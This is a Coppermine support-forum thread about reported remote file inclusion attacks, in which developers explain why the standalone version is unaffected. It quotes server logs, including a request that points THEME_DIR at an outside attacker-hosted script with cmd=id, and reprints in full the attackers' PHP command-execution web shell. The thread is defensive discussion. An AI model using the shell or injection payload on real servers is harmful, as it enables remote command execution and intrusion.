Possible security threat does NOT apply to coppermine standalone Possible security threat does NOT apply to coppermine standalone
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Possible security threat does NOT apply to coppermine standalone

Started by Joachim Müller, June 01, 2004, 08:01:58 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Joachim Müller

DeadKenny reported continues attacks on his coppermine standalone install that all failed
Quote from: DeadKennyIt seems some guys (adolescent jerks) in Brazil are trying to hack my Coppermine.

First I get a bunch of web server entries like this...

200.177.162.14 - - [20/May/2004:08:55:13 +0100] "POST /modules/coppermine/themes/default/theme.php HTTP/1.0" 404 328 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:14 +0100] "POST /modules/coppermine/include/init.inc.php HTTP/1.0" 404 324 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:15 +0100] "POST /modules/coppermine/themes/coppercop/theme.php HTTP/1.0" 404 330 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:16 +0100] "POST /modules/coppermine/themes/maze/theme.php HTTP/1.0" 404 325 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:17 +0100] "POST /modules/My_eGallery/public/displayCategory.php HTTP/1.0" 404 331 "-" "Mozilla 4.0 (Linux)"

Which fail miserably because I don't have coppermine in any normal path nor do I use CPGNUKE.

and then I get this...

200.103.127.12 - - [21/May/2004:04:53:29 +0100] "GET http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 404 329 "http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Again fails thanks to where I keep coppermine.

I have this on two virtual hosts and from a mixture of IP addresses all resolving to .br domains.

He then reports of a theme dir hack that is supposed to make coppermine vulnerable
Quote from: DeadKennyInterestingly the THEME_DIR hack is a script allowing some kind of back-door access to your system...<br><font face="verdana" size="2"><center><b>CMD</b> - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture<br></center></font>
<font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture</b><br>
<br>
<br>
<hr color="black" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="black" width=751px height=115px>
<br>
<font face="Verdana" size="1"><b>#RF</b><br><b>@ </b>irc.brasnet.org<br><b># </b>
www.rfcrew.com.br</font><br><b>#</b></font><font face="verdana" size="1"> Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture ::
</font></p>
I did a search on these jerks and all that came up is a large number of sites these idiots have defaced and proudly proclaim they "ownz" them  

I assume people here are aware of this vulnerability?


We (the coppermine dev team) had a look into this - all users of coppermine standalone (with or without bbs integration) can rest assured: the vulnerability does NOT apply to any coppermine standalone version!

Details:
  • our theme files have only functions and variables (no post processing or includes, etc)
  • $THEME_DIR variable is initialized each time from within init.inc.php, which would lead me to think this attack would only work on CPG standalone if we had a file using the templating system to generate output without making an 'in Coppermine' declaration. Even then, the call to init.inc.php should overwrite the $THEME_DIR variable with the correct value
  • 'THEME_DIR' in the theme.php file doesn't even read the GET variables, and is encapsulated. In init.inc.php we have the IN_COPPERMINE check plus it checks to see if 'THEME' is a valid directory, not 'THEME_DIR'
We just wanted to point this out in case someone reads the name "coppermine" on SecurityFocus - they are reporting the CPGNuke problems as Coppermine problems, which is not the case.

GauGau
-Coppermine project manager-

DeadKenny

Cheers. Thanks for looking into that, I can rest easy now (though with 'modules' in the path I did wonder as coppermine standalone doesn't have that) :)

cerberus

With Best Regards, Cerberus
Edamus, bibamus, gaudeamus.
http://www.pocketpcrussia.com - My Main Site

timdorr

Just FYI for the PostNuke/PHPNuke integration users out there, this was exploited on one of my systems recently. Since no one seems to be giving a fix, here's what you add:

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

Just pop that above the global $template, $template_display_picture, $template_image_comments, $template_add_your_comment; line in the modules/coppermine/themes/*/theme.php files and it fixes the security hole.

Joachim Müller

Urm, just to make this clear: the board you're posting on doesn't deal with the nuked version of coppermine, only the standalone. We have this existing post to point out that the standalone (and that's the only version we can talk about on this board) is not affected by all those bug reports that float around on the internet, warning people not to use coppermine. Those people should more correctly warn not to use phpNuke at all.
Those who cursory read this thread might get the impression that standalone coppermine was affected, which is not the case - timdorr's posting was meant OK, he was trying to help others, but this board is the wrong place for it - better post it on nuke-related sites.

Joachim

ecto

Old thread, I know, but here's some new news.

"Mambo, Coppermine and PHPBB Attacks"

"The attacks have a similar mechanism to the previous awstats and xmlrpc.php attacks that we recorded a few weeks ago, which exploits the input validation vlnerability of the said applications to inject code that then downloads a malware called "listen", very similar to lupii malware."
http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17

I don't want to start flaming Mr. Talabis (the author) yet, as I haven't looked that closely at the code myself, but I guess his claim that Coppermine is vulnerable to this attack is as invalid as it was over a year ago.

Nibbler

It's about as invalid as you can get - the file that is supposed to have the vulnerability does not exist in Coppermine standalone.

ecto

Heh, of course.. should have seen that one :) And even if it did exist in that directory, it wouldn't be vulnerable.

I sent Mr. Talabis a mail about it, hopefully he'll update the article to avoid worsening Coppermine's reputation.

ecto

I got a response from Mr. Talabis, and he referenced to http://secunia.com/advisories/11524/ .  Maybe one of the devs could contact Secunia to update that page, as people obviously still use it for reference, even though it's been 1,5 years since it's posting and it still says "Solution Status: Unpatched".

Mr. Talabis suggested that he could update the article and mention that the vulnerability does not apply to the current CPG version, and I kindly asked him to do so.


ecto

Mr. Talabis has updated the article now, but it only states that the current version isn't vulnerable to the attack mentioned. I'd like to know from what version that vulnerability is fixed, so I can tell him to update the article accordingly, and so that people reading it will know if they have an urgent need to upgrade or not.